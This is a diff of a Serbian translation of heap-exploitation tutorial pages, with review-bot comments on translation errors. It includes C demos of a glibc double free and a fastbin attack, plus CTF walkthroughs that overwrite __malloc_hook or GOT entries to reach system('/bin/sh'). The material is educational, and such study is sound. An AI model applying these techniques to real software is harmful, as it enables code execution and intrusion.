+Primer: ```c #include #include int main() { - // Allocate memory for three chunks - char *a = (char *)malloc(10); - char *b = (char *)malloc(10); - char *c = (char *)malloc(10); - char *d = (char *)malloc(10); - char *e = (char *)malloc(10); - char *f = (char *)malloc(10); - char *g = (char *)malloc(10); - char *h = (char *)malloc(10); - char *i = (char *)malloc(10); +// Allocate memory for three chunks +char *a = (char *)malloc(10); +char *b = (char *)malloc(10); +char *c = (char *)malloc(10); +char *d = (char *)malloc(10); +char *e = (char *)malloc(10); +char *f = (char *)malloc(10); +char *g = (char *)malloc(10); +char *h = (char *)malloc(10); +char *i = (char *)malloc(10); - // Print initial memory addresses - printf("Initial allocations:\n"); - printf("a: %p\n", (void *)a); - printf("b: %p\n", (void *)b); - printf("c: %p\n", (void *)c); - printf("d: %p\n", (void *)d); - printf("e: %p\n", (void *)e); - printf("f: %p\n", (void *)f); - printf("g: %p\n", (void *)g); - printf("h: %p\n", (void *)h); - printf("i: %p\n", (void *)i); +// Print initial memory addresses +printf("Initial allocations:\n"); +printf("a: %p\n", (void *)a); +printf("b: %p\n", (void *)b); +printf("c: %p\n", (void *)c); +printf("d: %p\n", (void *)d); +printf("e: %p\n", (void *)e); +printf("f: %p\n", (void *)f); +printf("g: %p\n", (void *)g); +printf("h: %p\n", (void *)h); +printf("i: %p\n", (void *)i); - // Fill tcache - free(a); - free(b); - free(c); - free(d); - free(e); - free(f); - free(g); +// Fill tcache +free(a); +free(b); +free(c); +free(d); +free(e); +free(f); +free(g); - // Introduce double-free vulnerability in fast bin - free(h); - free(i); - free(h); +// Introduce double-free vulnerability in fast bin +free(h); +free(i); +free(h); - // Reallocate memory and print the addresses - char *a1 = (char *)malloc(10); - char *b1 = (char *)malloc(10); - char *c1 = (char *)malloc(10); - char *d1 = (char *)malloc(10); - char *e1 = (char *)malloc(10); - char *f1 = (char *)malloc(10); - char *g1 
= (char *)malloc(10); - char *h1 = (char *)malloc(10); - char *i1 = (char *)malloc(10); - char *i2 = (char *)malloc(10); +// Reallocate memory and print the addresses +char *a1 = (char *)malloc(10); +char *b1 = (char *)malloc(10); +char *c1 = (char *)malloc(10); +char *d1 = (char *)malloc(10); +char *e1 = (char *)malloc(10); +char *f1 = (char *)malloc(10); +char *g1 = (char *)malloc(10); +char *h1 = (char *)malloc(10); +char *i1 = (char *)malloc(10); +char *i2 = (char *)malloc(10); - // Print initial memory addresses - printf("After reallocations:\n"); - printf("a1: %p\n", (void *)a1); - printf("b1: %p\n", (void *)b1); - printf("c1: %p\n", (void *)c1); - printf("d1: %p\n", (void *)d1); - printf("e1: %p\n", (void *)e1); - printf("f1: %p\n", (void *)f1); - printf("g1: %p\n", (void *)g1); - printf("h1: %p\n", (void *)h1); - printf("i1: %p\n", (void *)i1); - printf("i2: %p\n", (void *)i2); +// Print initial memory addresses +printf("After reallocations:\n"); +printf("a1: %p\n", (void *)a1); +printf("b1: %p\n", (void *)b1); +printf("c1: %p\n", (void *)c1); +printf("d1: %p\n", (void *)d1); +printf("e1: %p\n", (void *)e1); +printf("f1: %p\n", (void *)f1); +printf("g1: %p\n", (void *)g1); +printf("h1: %p\n", (void *)h1); +printf("i1: %p\n", (void *)i1); +printf("i2: %p\n", (void *)i2); - return 0; +return 0; } ``` +U ovom primeru, nakon popunjavanja tcache-a sa nekoliko oslobođenih delova (7), kod **oslobađa deo `h`, zatim deo `i`, a zatim ponovo `h`, uzrokujući double free** (poznat i kao Fast Bin dup). Ovo otvara mogućnost dobijanja preklapajućih memorijskih adresa prilikom ponovnog alociranja, što znači da dva ili više pokazivača mogu ukazivati na istu memorijsku lokaciju. Manipulacija podacima kroz jedan pokazivač može zatim uticati na drugi, stvarajući kritičan bezbednosni rizik i potencijal za eksploataciju. 
-In this example, after filling the tcache with several freed chunks (7), the code **frees chunk `h`, then chunk `i`, and then `h` again, causing a double free** (also known as Fast Bin dup). This opens the possibility of receiving overlapping memory addresses when reallocating, meaning two or more pointers can point to the same memory location. Manipulating data through one pointer can then affect the other, creating a critical security risk and potential for exploitation. +Izvršavajući to, obratite pažnju na to kako **`i1` i `i2` imaju istu adresu**: -Executing it, note how **`i1` and `i2` got the same address**: - -
Initial allocations:
+
Početne alokacije:
 a: 0xaaab0f0c22a0
 b: 0xaaab0f0c22c0
 c: 0xaaab0f0c22e0
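Review bot: `+Početne alokacije:` translates program output that the code on this page still prints in English: the `<pre>` block is the output of the C example directly above it, whose `printf("Initial allocations:\n")` line is unchanged, so the listing no longer matches what the program prints; keep the `<pre>` text exactly as the program produces it. In the same hunk, "fast bin" is rendered "brzi bin" in "(npr. \"brzi bin\")" while fast-bin-attack.md in this same commit leaves it as "fast bin"; keep the bin name untranslated for cross-page consistency. The C block also loses all indentation (`-    char *a = (char *)malloc(10);` becomes `+char *a = (char *)malloc(10);`); since those lines are being rewritten anyway, the comment `// Allocate memory for three chunks` above nine `malloc` calls could be corrected in the same pass.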
@@ -96,7 +94,7 @@ f: 0xaaab0f0c2340
 g: 0xaaab0f0c2360
 h: 0xaaab0f0c2380
 i: 0xaaab0f0c23a0
-After reallocations:
+Nakon ponovnih alokacija:
 a1: 0xaaab0f0c2360
 b1: 0xaaab0f0c2340
 c1: 0xaaab0f0c2320
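Review bot: Same problem as the previous hunk: `+Nakon ponovnih alokacija:` replaces the literal output of `printf("After reallocations:\n")`, so the listing diverges from the program that is supposed to have produced it; leave it as "After reallocations:".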
@@ -109,23 +107,23 @@ h1: 0xaaab0f0c2380
 i2: 0xaaab0f0c23a0
 
-## Examples +## Primeri - [**Dragon Army. Hack The Box**](https://7rocky.github.io/en/ctf/htb-challenges/pwn/dragon-army/) - - We can only allocate Fast-Bin-sized chunks except for size `0x70`, which prevents the usual `__malloc_hook` overwrite. - - Instead, we use PIE addresses that start with `0x56` as a target for Fast Bin dup (1/2 chance). - - One place where PIE addresses are stored is in `main_arena`, which is inside Glibc and near `__malloc_hook` - - We target a specific offset of `main_arena` to allocate a chunk there and continue allocating chunks until reaching `__malloc_hook` to get code execution. +- Možemo alocirati samo Fast-Bin veličine delove osim za veličinu `0x70`, što sprečava uobičajeno prepisivanje `__malloc_hook`. +- Umesto toga, koristimo PIE adrese koje počinju sa `0x56` kao cilj za Fast Bin dup (1/2 šansa). +- Jedno mesto gde se čuvaju PIE adrese je u `main_arena`, koja se nalazi unutar Glibc i blizu `__malloc_hook`. +- Ciljamo specifičan pomak `main_arena` da bismo alocirali deo tamo i nastavljamo sa alokacijom delova dok ne dođemo do `__malloc_hook` da bismo dobili izvršenje koda. - [**zero_to_hero. PicoCTF**](https://7rocky.github.io/en/ctf/picoctf/binary-exploitation/zero_to_hero/) - - Using Tcache bins and a null-byte overflow, we can achieve a double-free situation: - - We allocate three chunks of size `0x110` (`A`, `B`, `C`) - - We free `B` - - We free `A` and allocate again to use the null-byte overflow - - Now `B`'s size field is `0x100`, instead of `0x111`, so we can free it again - - We have one Tcache-bin of size `0x110` and one of size `0x100` that point to the same address. So we have a double free. 
- - We leverage the double free using [Tcache poisoning](tcache-bin-attack.md) +- Koristeći Tcache binove i overflow sa null-bajtom, možemo postići situaciju double-free: +- Alociramo tri dela veličine `0x110` (`A`, `B`, `C`) +- Oslobađamo `B` +- Oslobađamo `A` i ponovo alociramo da bismo iskoristili overflow sa null-bajtom +- Sada je veličina `B`-ovog polja `0x100`, umesto `0x111`, tako da ga možemo ponovo osloboditi +- Imamo jedan Tcache-bin veličine `0x110` i jedan veličine `0x100` koji ukazuju na istu adresu. Tako imamo double free. +- Iskorišćavamo double free koristeći [Tcache poisoning](tcache-bin-attack.md) -## References +## Reference - [https://heap-exploitation.dhavalkapil.com/attacks/double_free](https://heap-exploitation.dhavalkapil.com/attacks/double_free) diff --git a/src/binary-exploitation/libc-heap/fast-bin-attack.md b/src/binary-exploitation/libc-heap/fast-bin-attack.md index c36c675de..c500203fa 100644 --- a/src/binary-exploitation/libc-heap/fast-bin-attack.md +++ b/src/binary-exploitation/libc-heap/fast-bin-attack.md @@ -2,18 +2,17 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne informacije -For more information about what is a fast bin check this page: +Za više informacija o tome šta je fast bin, pogledajte ovu stranicu: {{#ref}} bins-and-memory-allocations.md {{#endref}} -Because the fast bin is a singly linked list, there are much less protections than in other bins and just **modifying an address in a freed fast bin** chunk is enough to be able to **allocate later a chunk in any memory address**. - -As summary: +Pošto je fast bin jednostruko povezani spisak, postoji mnogo manje zaštita nego u drugim binovima i samo **modifikacija adrese u oslobođenom fast bin** delu je dovoljna da se **kasnije alocira deo na bilo kojoj memorijskoj adresi**. +Kao rezime: ```c ptr0 = malloc(0x20); ptr1 = malloc(0x20); 
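Review bot: In the zero_to_hero bullet, "Now `B`'s size field is `0x100`" is translated as "Sada je veličina `B`-ovog polja `0x100`" (the size of B's field), which loses the point that it is the chunk's size field that the null byte truncated; "Sada je polje veličine dela `B` `0x100`" keeps the meaning. In the Dragon Army bullet, "Fast-Bin veličine delove" is an unnatural word order for "Fast-Bin-sized chunks" ("delove fast bin veličine"). In the fast-bin-attack.md Basic Information hunk, "singly linked list" becomes "jednostruko povezani spisak" where the rest of this commit uses "lista" ("listu slobodnih delova" in double-free.md); use "jednostruko povezana lista". The blank lines before and after the ```c fence are again dropped in this hunk.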
@@ -29,9 +28,7 @@ free(ptr1) ptr2 = malloc(0x20); // This will get ptr1 ptr3 = malloc(0x20); // This will get a chunk in the
which could be abuse to overwrite arbitrary content inside of it ``` - -You can find a full example in a very well explained code from [https://guyinatuxedo.github.io/28-fastbin_attack/explanation_fastbinAttack/index.html](https://guyinatuxedo.github.io/28-fastbin_attack/explanation_fastbinAttack/index.html): - +Možete pronaći potpuni primer u veoma dobro objašnjenom kodu sa [https://guyinatuxedo.github.io/28-fastbin_attack/explanation_fastbinAttack/index.html](https://guyinatuxedo.github.io/28-fastbin_attack/explanation_fastbinAttack/index.html): ```c #include #include 
@@ -39,112 +36,111 @@ You can find a full example in a very well explained code from [https://guyinatu int main(void) { - puts("Today we will be discussing a fastbin attack."); - puts("There are 10 fastbins, which act as linked lists (they're separated by size)."); - puts("When a chunk is freed within a certain size range, it is added to one of the fastbin linked lists."); - puts("Then when a chunk is allocated of a similar size, it grabs chunks from the corresponding fastbin (if there are chunks in it)."); - puts("(think sizes 0x10-0x60 for fastbins, but that can change depending on some settings)"); - puts("\nThis attack will essentially attack the fastbin by using a bug to edit the linked list to point to a fake chunk we want to allocate."); - puts("Pointers in this linked list are allocated when we allocate a chunk of the size that corresponds to the fastbin."); - puts("So we will just allocate chunks from the fastbin after we edit a pointer to point to our fake chunk, to get malloc to return a pointer to our fake chunk.\n"); - puts("So the tl;dr objective of a fastbin attack is to allocate a chunk to a memory region of our choosing.\n"); +puts("Today we will be discussing a fastbin attack."); +puts("There are 10 fastbins, which act as linked lists (they're separated by size)."); +puts("When a chunk is freed within a certain size range, it is added to one of the fastbin linked lists."); +puts("Then when a chunk is allocated of a similar size, it grabs chunks from the corresponding fastbin (if there are chunks in it)."); +puts("(think sizes 0x10-0x60 for fastbins, but that can change depending on some settings)"); +puts("\nThis attack will essentially attack the fastbin by using a bug to edit the linked list to point to a fake chunk we want to allocate."); +puts("Pointers in this linked list are allocated when we allocate a chunk of the size that corresponds to the fastbin."); +puts("So we will just allocate chunks from the fastbin after we edit a pointer to 
point to our fake chunk, to get malloc to return a pointer to our fake chunk.\n"); +puts("So the tl;dr objective of a fastbin attack is to allocate a chunk to a memory region of our choosing.\n"); - puts("Let's start, we will allocate three chunks of size 0x30\n"); - unsigned long *ptr0, *ptr1, *ptr2; +puts("Let's start, we will allocate three chunks of size 0x30\n"); +unsigned long *ptr0, *ptr1, *ptr2; - ptr0 = malloc(0x30); - ptr1 = malloc(0x30); - ptr2 = malloc(0x30); +ptr0 = malloc(0x30); +ptr1 = malloc(0x30); +ptr2 = malloc(0x30); - printf("Chunk 0: %p\n", ptr0); - printf("Chunk 1: %p\n", ptr1); - printf("Chunk 2: %p\n\n", ptr2); +printf("Chunk 0: %p\n", ptr0); +printf("Chunk 1: %p\n", ptr1); +printf("Chunk 2: %p\n\n", ptr2); - printf("Next we will make an integer variable on the stack. Our goal will be to allocate a chunk to this variable (because why not).\n"); +printf("Next we will make an integer variable on the stack. Our goal will be to allocate a chunk to this variable (because why not).\n"); - int stackVar = 0x55; +int stackVar = 0x55; - printf("Integer: %x\t @: %p\n\n", stackVar, &stackVar); +printf("Integer: %x\t @: %p\n\n", stackVar, &stackVar); - printf("Proceeding that I'm going to write just some data to the three heap chunks\n"); +printf("Proceeding that I'm going to write just some data to the three heap chunks\n"); - char *data0 = "00000000"; - char *data1 = "11111111"; - char *data2 = "22222222"; +char *data0 = "00000000"; +char *data1 = "11111111"; +char *data2 = "22222222"; - memcpy(ptr0, data0, 0x8); - memcpy(ptr1, data1, 0x8); - memcpy(ptr2, data2, 0x8); +memcpy(ptr0, data0, 0x8); +memcpy(ptr1, data1, 0x8); +memcpy(ptr2, data2, 0x8); - printf("We can see the data that is held in these chunks. This data will get overwritten when they get added to the fastbin.\n"); +printf("We can see the data that is held in these chunks. 
This data will get overwritten when they get added to the fastbin.\n"); - printf("Chunk 0: %s\n", (char *)ptr0); - printf("Chunk 1: %s\n", (char *)ptr1); - printf("Chunk 2: %s\n\n", (char *)ptr2); +printf("Chunk 0: %s\n", (char *)ptr0); +printf("Chunk 1: %s\n", (char *)ptr1); +printf("Chunk 2: %s\n\n", (char *)ptr2); - printf("Next we are going to free all three pointers. This will add all of them to the fastbin linked list. We can see that they hold pointers to chunks that will be allocated.\n"); +printf("Next we are going to free all three pointers. This will add all of them to the fastbin linked list. We can see that they hold pointers to chunks that will be allocated.\n"); - free(ptr0); - free(ptr1); - free(ptr2); +free(ptr0); +free(ptr1); +free(ptr2); - printf("Chunk0 @ 0x%p\t contains: %lx\n", ptr0, *ptr0); - printf("Chunk1 @ 0x%p\t contains: %lx\n", ptr1, *ptr1); - printf("Chunk2 @ 0x%p\t contains: %lx\n\n", ptr2, *ptr2); +printf("Chunk0 @ 0x%p\t contains: %lx\n", ptr0, *ptr0); +printf("Chunk1 @ 0x%p\t contains: %lx\n", ptr1, *ptr1); +printf("Chunk2 @ 0x%p\t contains: %lx\n\n", ptr2, *ptr2); - printf("So we can see that the top two entries in the fastbin (the last two chunks we freed) contains pointers to the next chunk in the fastbin. The last chunk in there contains `0x0` as the next pointer to indicate the end of the linked list.\n\n"); +printf("So we can see that the top two entries in the fastbin (the last two chunks we freed) contains pointers to the next chunk in the fastbin. The last chunk in there contains `0x0` as the next pointer to indicate the end of the linked list.\n\n"); - printf("Now we will edit a freed chunk (specifically the second chunk \"Chunk 1\"). We will be doing it with a use after free, since after we freed it we didn't get rid of the pointer.\n"); - printf("We will edit it so the next pointer points to the address of the stack integer variable we talked about earlier. 
This way when we allocate this chunk, it will put our fake chunk (which points to the stack integer) on top of the free list.\n\n"); +printf("Now we will edit a freed chunk (specifically the second chunk \"Chunk 1\"). We will be doing it with a use after free, since after we freed it we didn't get rid of the pointer.\n"); +printf("We will edit it so the next pointer points to the address of the stack integer variable we talked about earlier. This way when we allocate this chunk, it will put our fake chunk (which points to the stack integer) on top of the free list.\n\n"); - *ptr1 = (unsigned long)((char *)&stackVar); +*ptr1 = (unsigned long)((char *)&stackVar); - printf("We can see it's new value of Chunk1 @ %p\t hold: 0x%lx\n\n", ptr1, *ptr1); +printf("We can see it's new value of Chunk1 @ %p\t hold: 0x%lx\n\n", ptr1, *ptr1); - printf("Now we will allocate three new chunks. The first one will pretty much be a normal chunk. The second one is the chunk which the next pointer we overwrote with the pointer to the stack variable.\n"); - printf("When we allocate that chunk, our fake chunk will be at the top of the fastbin. Then we can just allocate one more chunk from that fastbin to get malloc to return a pointer to the stack variable.\n\n"); +printf("Now we will allocate three new chunks. The first one will pretty much be a normal chunk. The second one is the chunk which the next pointer we overwrote with the pointer to the stack variable.\n"); +printf("When we allocate that chunk, our fake chunk will be at the top of the fastbin. 
Then we can just allocate one more chunk from that fastbin to get malloc to return a pointer to the stack variable.\n\n"); - unsigned long *ptr3, *ptr4, *ptr5; +unsigned long *ptr3, *ptr4, *ptr5; - ptr3 = malloc(0x30); - ptr4 = malloc(0x30); - ptr5 = malloc(0x30); +ptr3 = malloc(0x30); +ptr4 = malloc(0x30); +ptr5 = malloc(0x30); - printf("Chunk 3: %p\n", ptr3); - printf("Chunk 4: %p\n", ptr4); - printf("Chunk 5: %p\t Contains: 0x%x\n", ptr5, (int)*ptr5); +printf("Chunk 3: %p\n", ptr3); +printf("Chunk 4: %p\n", ptr4); +printf("Chunk 5: %p\t Contains: 0x%x\n", ptr5, (int)*ptr5); - printf("\n\nJust like that, we executed a fastbin attack to allocate an address to a stack variable using malloc!\n"); +printf("\n\nJust like that, we executed a fastbin attack to allocate an address to a stack variable using malloc!\n"); } ``` - > [!CAUTION] -> If it's possible to overwrite the value of the global variable **`global_max_fast`** with a big number, this allows to generate fast bin chunks of bigger sizes, potentially allowing to perform fast bin attacks in scenarios where it wasn't possible previously. This situation useful in the context of [large bin attack](large-bin-attack.md) and [unsorted bin attack](unsorted-bin-attack.md) +> Ako je moguće prepisati vrednost globalne promenljive **`global_max_fast`** velikim brojem, to omogućava generisanje fast bin chunk-ova većih veličina, potencijalno omogućavajući izvođenje fast bin napada u scenarijima gde to prethodno nije bilo moguće. Ova situacija je korisna u kontekstu [large bin attack](large-bin-attack.md) i [unsorted bin attack](unsorted-bin-attack.md) -## Examples +## Primeri - **CTF** [**https://guyinatuxedo.github.io/28-fastbin_attack/0ctf_babyheap/index.html**](https://guyinatuxedo.github.io/28-fastbin_attack/0ctf_babyheap/index.html)**:** - - It's possible to allocate chunks, free them, read their contents and fill them (with an overflow vulnerability). 
- - **Consolidate chunk for infoleak**: The technique is basically to abuse the overflow to create a fake `prev_size` so one previous chunks is put inside a bigger one, so when allocating the bigger one containing another chunk, it's possible to print it's data an leak an address to libc (`main_arena+88`). - - **Overwrite malloc hook**: For this, and abusing the previous overlapping situation, it was possible to have 2 chunks that were pointing to the same memory. Therefore, freeing them both (freeing another chunk in between to avoid protections) it was possible to have the same chunk in the fast bin 2 times. Then, it was possible to allocate it again, overwrite the address to the next chunk to point a bit before `__malloc_hook` (so it points to an integer that malloc thinks is a free size - another bypass), allocate it again and then allocate another chunk that will receive an address to malloc hooks.\ - Finally a **one gadget** was written in there. +- Moguće je alocirati chunk-ove, osloboditi ih, pročitati njihov sadržaj i popuniti ih (sa ranjivošću prelivanja). +- **Konsolidacija chunk-a za infoleak**: Tehnika se u suštini sastoji u zloupotrebi prelivanja kako bi se kreirao lažni `prev_size`, tako da jedan prethodni chunk bude smešten unutar većeg, tako da kada se alocira veći koji sadrži drugi chunk, moguće je odštampati njegove podatke i procuriti adresu do libc (`main_arena+88`). +- **Prepisivanje malloc hook-a**: Za ovo, i zloupotrebljavajući prethodnu preklapajuću situaciju, bilo je moguće imati 2 chunk-a koja su ukazivala na istu memoriju. Stoga, oslobađanjem oba (oslobađanjem drugog chunk-a između da bi se izbegle zaštite) bilo je moguće imati isti chunk u fast bin-u 2 puta. 
Zatim, bilo je moguće ponovo ga alocirati, prepisati adresu sledećeg chunk-a da ukazuje malo pre `__malloc_hook` (tako da ukazuje na ceo broj za koji malloc misli da je slobodna veličina - još jedan zaobilaženje), ponovo ga alocirati i zatim alocirati drugi chunk koji će primiti adresu do malloc hook-ova.\ +Na kraju, **one gadget** je napisan unutra. - **CTF** [**https://guyinatuxedo.github.io/28-fastbin_attack/csaw17_auir/index.html**](https://guyinatuxedo.github.io/28-fastbin_attack/csaw17_auir/index.html)**:** - - There is a heap overflow and use after free and double free because when a chunk is freed it's possible to reuse and re-free the pointers - - **Libc info leak**: Just free some chunks and they will get a pointer to a part of the main arena location. As you can reuse freed pointers, just read this address. - - **Fast bin attack**: All the pointers to the allocations are stored inside an array, so we can free a couple of fast bin chunks and in the last one overwrite the address to point a bit before this array of pointers. Then, allocate a couple of chunks with the same size and we will get first the legit one and then the fake one containing the array of pointers. We can now overwrite this allocation pointers to make the GOT address of `free` point to `system` and then write `"/bin/sh"` in chunk 1 to then call `free(chunk1)` which instead will execute `system("/bin/sh")`. +- Postoji heap overflow i upotreba nakon oslobađanja i dvostruko oslobađanje jer kada se chunk oslobodi, moguće je ponovo koristiti i ponovo osloboditi pokazivače. +- **Libc info leak**: Samo oslobodite neke chunk-ove i dobićete pokazivač na deo lokacije glavne arene. Kako možete ponovo koristiti oslobođene pokazivače, samo pročitajte ovu adresu. +- **Fast bin attack**: Svi pokazivači na alokacije se čuvaju unutar niza, tako da možemo osloboditi nekoliko fast bin chunk-ova i u poslednjem prepisati adresu da ukazuje malo pre ovog niza pokazivača. 
Zatim, alocirajte nekoliko chunk-ova iste veličine i prvo ćemo dobiti legitiman, a zatim lažni koji sadrži niz pokazivača. Sada možemo prepisati ove pokazivače alokacije da učinimo GOT adresu `free` da ukazuje na `system` i zatim napisati `"/bin/sh"` u chunk 1 da bismo zatim pozvali `free(chunk1)` koji će umesto toga izvršiti `system("/bin/sh")`. - **CTF** [**https://guyinatuxedo.github.io/33-custom_misc_heap/csaw19_traveller/index.html**](https://guyinatuxedo.github.io/33-custom_misc_heap/csaw19_traveller/index.html) - - Another example of abusing a one byte overflow to consolidate chunks in the unsorted bin and get a libc infoleak and then perform a fast bin attack to overwrite malloc hook with a one gadget address +- Još jedan primer zloupotrebe prelivanja od jednog bajta za konsolidaciju chunk-ova u nesortiranom binu i dobijanje libc infoleak-a, a zatim izvođenje fast bin napada za prepisivanje malloc hook-a sa adresom one gadget-a. - **CTF** [**https://guyinatuxedo.github.io/33-custom_misc_heap/csaw18_alienVSsamurai/index.html**](https://guyinatuxedo.github.io/33-custom_misc_heap/csaw18_alienVSsamurai/index.html) - - After an infoleak abusing the unsorted bin with a UAF to leak a libc address and a PIE address, the exploit of this CTF used a fast bin attack to allocate a chunk in a place where the pointers to controlled chunks were located so it was possible to overwrite certain pointers to write a one gadget in the GOT - - You can find a Fast Bin attack abused through an unsorted bin attack: - - Note that it's common before performing fast bin attacks to abuse the free-lists to leak libc/heap addresses (when needed). +- Nakon infoleak-a zloupotrebljavajući nesortirani bin sa UAF za procurivanje libc adrese i PIE adrese, eksploatacija ovog CTF-a koristila je fast bin napad za alociranje chunk-a na mestu gde su se nalazili pokazivači na kontrolisane chunk-ove, tako da je bilo moguće prepisati određene pokazivače da bi se napisao one gadget u GOT. 
+- Možete pronaći Fast Bin napad zloupotrebljen kroz nesortirani bin napad: +- Imajte na umu da je uobičajeno pre izvođenja fast bin napada zloupotrebljavati slobodne liste za procurivanje libc/heap adresa (kada je potrebno). - [**Robot Factory. BlackHat MEA CTF 2022**](https://7rocky.github.io/en/ctf/other/blackhat-ctf/robot-factory/) - - We can only allocate chunks of size greater than `0x100`. - - Overwrite `global_max_fast` using an Unsorted Bin attack (works 1/16 times due to ASLR, because we need to modify 12 bits, but we must modify 16 bits). - - Fast Bin attack to modify the a global array of chunks. This gives an arbitrary read/write primitive, which allows to modify the GOT and set some function to point to `system`. +- Možemo alocirati samo chunk-ove veličine veće od `0x100`. +- Prepišite `global_max_fast` koristeći Unsorted Bin napad (radi 1/16 puta zbog ASLR, jer treba da modifikujemo 12 bita, ali moramo modifikovati 16 bita). +- Fast Bin napad za modifikaciju globalnog niza chunk-ova. Ovo daje proizvoljnu read/write primitivu, koja omogućava modifikaciju GOT-a i postavljanje neke funkcije da ukazuje na `system`. {{#ref}} unsorted-bin-attack.md diff --git a/src/binary-exploitation/libc-heap/heap-memory-functions/README.md b/src/binary-exploitation/libc-heap/heap-memory-functions/README.md index 04855d5fb..70d10ca79 100644 --- a/src/binary-exploitation/libc-heap/heap-memory-functions/README.md +++ b/src/binary-exploitation/libc-heap/heap-memory-functions/README.md @@ -1,4 +1,4 @@ -# Heap Memory Functions +# Funkcije za Heap Memoriju {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/libc-heap/heap-memory-functions/free.md b/src/binary-exploitation/libc-heap/heap-memory-functions/free.md index e57b1fa77..fcce1f35c 100644 --- a/src/binary-exploitation/libc-heap/heap-memory-functions/free.md +++ b/src/binary-exploitation/libc-heap/heap-memory-functions/free.md 
@@ -4,93 +4,90 @@ ## Free Order Summary -(No checks are explained in this summary and some case have been omitted for brevity) +(Nema provera objašnjenih u ovom sažetku i neki slučajevi su izostavljeni radi sažetosti) -1. If the address is null don't do anything -2. If the chunk was mmaped, mummap it and finish -3. Call `_int_free`: - 1. If possible, add the chunk to the tcache - 2. If possible, add the chunk to the fast bin - 3. Call `_int_free_merge_chunk` to consolidate the chunk is needed and add it to the unsorted list +1. Ako je adresa null, ne radite ništa +2. Ako je deo bio mmapovan, mummapujte ga i završite +3. Pozovite `_int_free`: + 1. Ako je moguće, dodajte deo u tcache + 2. Ako je moguće, dodajte deo u fast bin + 3. Pozovite `_int_free_merge_chunk` da konsolidujete deo ako je potrebno i dodajte ga u nesortiranu listu ## \_\_libc_free -`Free` calls `__libc_free`. +`Free` poziva `__libc_free`. -- If the address passed is Null (0) don't do anything. -- Check pointer tag -- If the chunk is `mmaped`, `mummap` it and that all -- If not, add the color and call `_int_free` over it +- Ako je adresa koja je prosleđena Null (0), ne radite ništa. +- Proverite oznaku pokazivača +- Ako je deo `mmapovan`, `mummap`ujte ga i to je to +- Ako nije, dodajte boju i pozovite `_int_free` na njemu
__lib_free code - ```c void __libc_free (void *mem) { - mstate ar_ptr; - mchunkptr p; /* chunk corresponding to mem */ +mstate ar_ptr; +mchunkptr p; /* chunk corresponding to mem */ - if (mem == 0) /* free(0) has no effect */ - return; +if (mem == 0) /* free(0) has no effect */ +return; - /* Quickly check that the freed pointer matches the tag for the memory. - This gives a useful double-free detection. */ - if (__glibc_unlikely (mtag_enabled)) - *(volatile char *)mem; +/* Quickly check that the freed pointer matches the tag for the memory. +This gives a useful double-free detection. */ +if (__glibc_unlikely (mtag_enabled)) +*(volatile char *)mem; - int err = errno; +int err = errno; - p = mem2chunk (mem); +p = mem2chunk (mem); - if (chunk_is_mmapped (p)) /* release mmapped memory. */ - { - /* See if the dynamic brk/mmap threshold needs adjusting. - Dumped fake mmapped chunks do not affect the threshold. */ - if (!mp_.no_dyn_threshold - && chunksize_nomask (p) > mp_.mmap_threshold - && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX) - { - mp_.mmap_threshold = chunksize (p); - mp_.trim_threshold = 2 * mp_.mmap_threshold; - LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2, - mp_.mmap_threshold, mp_.trim_threshold); - } - munmap_chunk (p); - } - else - { - MAYBE_INIT_TCACHE (); +if (chunk_is_mmapped (p)) /* release mmapped memory. */ +{ +/* See if the dynamic brk/mmap threshold needs adjusting. +Dumped fake mmapped chunks do not affect the threshold. */ +if (!mp_.no_dyn_threshold +&& chunksize_nomask (p) > mp_.mmap_threshold +&& chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX) +{ +mp_.mmap_threshold = chunksize (p); +mp_.trim_threshold = 2 * mp_.mmap_threshold; +LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2, +mp_.mmap_threshold, mp_.trim_threshold); +} +munmap_chunk (p); +} +else +{ +MAYBE_INIT_TCACHE (); - /* Mark the chunk as belonging to the library again. 
*/ - (void)tag_region (chunk2mem (p), memsize (p)); +/* Mark the chunk as belonging to the library again. */ +(void)tag_region (chunk2mem (p), memsize (p)); - ar_ptr = arena_for_chunk (p); - _int_free (ar_ptr, p, 0); - } +ar_ptr = arena_for_chunk (p); +_int_free (ar_ptr, p, 0); +} - __set_errno (err); +__set_errno (err); } libc_hidden_def (__libc_free) ``` -
## \_int_free ### \_int_free start -It starts with some checks making sure: +Počinje sa nekim proverama koje osiguravaju: -- the **pointer** is **aligned,** or trigger error `free(): invalid pointer` -- the **size** isn't less than the minimum and that the **size** is also **aligned** or trigger error: `free(): invalid size` +- da je **pokazivač** **poravnat,** ili izaziva grešku `free(): invalid pointer` +- da **veličina** nije manja od minimuma i da je **veličina** takođe **poravnata** ili izaziva grešku: `free(): invalid size`
_int_free start - ```c // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L4493C1-L4513C28 @@ -99,288 +96,279 @@ It starts with some checks making sure: static void _int_free (mstate av, mchunkptr p, int have_lock) { - INTERNAL_SIZE_T size; /* its size */ - mfastbinptr *fb; /* associated fastbin */ +INTERNAL_SIZE_T size; /* its size */ +mfastbinptr *fb; /* associated fastbin */ - size = chunksize (p); +size = chunksize (p); - /* Little security check which won't hurt performance: the - allocator never wraps around at the end of the address space. - Therefore we can exclude some size values which might appear - here by accident or by "design" from some intruder. */ - if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0) - || __builtin_expect (misaligned_chunk (p), 0)) - malloc_printerr ("free(): invalid pointer"); - /* We know that each chunk is at least MINSIZE bytes in size or a - multiple of MALLOC_ALIGNMENT. */ - if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size))) - malloc_printerr ("free(): invalid size"); +/* Little security check which won't hurt performance: the +allocator never wraps around at the end of the address space. +Therefore we can exclude some size values which might appear +here by accident or by "design" from some intruder. */ +if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0) +|| __builtin_expect (misaligned_chunk (p), 0)) +malloc_printerr ("free(): invalid pointer"); +/* We know that each chunk is at least MINSIZE bytes in size or a +multiple of MALLOC_ALIGNMENT. */ +if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size))) +malloc_printerr ("free(): invalid size"); - check_inuse_chunk(av, p); +check_inuse_chunk(av, p); ``` -
